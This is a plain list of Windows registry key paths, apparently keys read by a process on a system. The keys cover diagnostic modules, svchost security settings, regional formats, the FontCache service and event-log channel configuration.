HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\Config HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\Software\Microsoft\RADAR\HeapLeakDetection\Settings HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical HKEY_LOCAL_MACHINE\Software\Classes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\svchost.exe HKEY_CURRENT_USER HKEY_CURRENT_USER\Control Panel\International HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc HKEY_LOCAL_MACHINE\system\Setup HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Reliability HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\TimeStampInterval HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-WindowsUpdateClient/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ChannelAccess HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-NetworkAccessProtection/WHC HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ChannelAccess HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Windows Defender/WHC HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ChannelAccess HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Diagnosis-Scheduled/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ChannelAccess HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\cval HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eventlog\Application\SecurityCenter HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\SecurityCenter\ProviderGuid HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-ReliabilityAnalysisComponent/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ControlGuid 